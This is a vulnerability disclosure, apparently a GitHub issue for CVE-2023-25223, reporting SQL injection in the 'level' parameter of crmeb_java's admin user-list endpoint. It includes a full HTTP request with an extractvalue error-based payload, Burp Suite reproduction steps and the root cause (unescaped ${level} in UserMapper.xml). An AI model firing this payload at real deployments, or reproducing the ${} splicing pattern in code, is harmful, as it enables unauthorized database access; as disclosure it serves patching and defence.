CVE-2023-25223: There is a sql injection vulnerability exists in crmeb_java · Issue #9 · crmeb/crmeb_java

[Suggested description]
sql injection vulnerability exists in crmeb_java <=1.3.4
/api/admin/user/list endpoint Unfiltered parameters ‘level’ cause sqli

[Vulnerability Type]
SQLi

[Vendor of Product]
https://github.com/crmeb/crmeb_java

[Affected Product Code Base]
<=1.3.4

[Affected Component]

GET /api/admin/user/list?labelId=&userType=routine&sex=&isPromoter=&country=&payCount=9&accessType=0&dateLimit=&keywords=&province=&city=&page=1&limit=15&level=1+and+extractvalue(1,CONCAT(1,user()))&groupId=1&temp=1675070029&addres=a% HTTP/2
Host: api.java.crmeb.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: application/json, text/plain, /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authori-Zation: 0d8ed99c6e51404f82a22ba15332300a
Origin: https://admin.java.crmeb.net
Referer: https://admin.java.crmeb.net/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Te: trailers

[Attack Type]
Remote

[Vulnerability details]
step 1 login admin click user Manager and click search button

step 2 intercept request use burpsuite

step 3 insert payload in paramter “level”

level=1+and+extractvalue(1,CONCAT(1,user()))

https://api.java.crmeb.net/api/admin/user/list?labelId=&userType=routine&sex=&isPromoter=&country=&payCount=9&accessType=0&dateLimit=&keywords=&province=&city=&page=1&limit=15&level=1+and+extractvalue(1,CONCAT(1,user()))&groupId=1&temp=1675070029&addres=a%

there you can see it

[Impact Code execution]
true
[Cause of vulnerability]
\crmeb\crmeb-service\src\main\resources\mapper\user\UserMapper.xml
line 36 “${level}”
When using "${}", program will do not do any processing, and directly splice the value into the sql statement lead sqli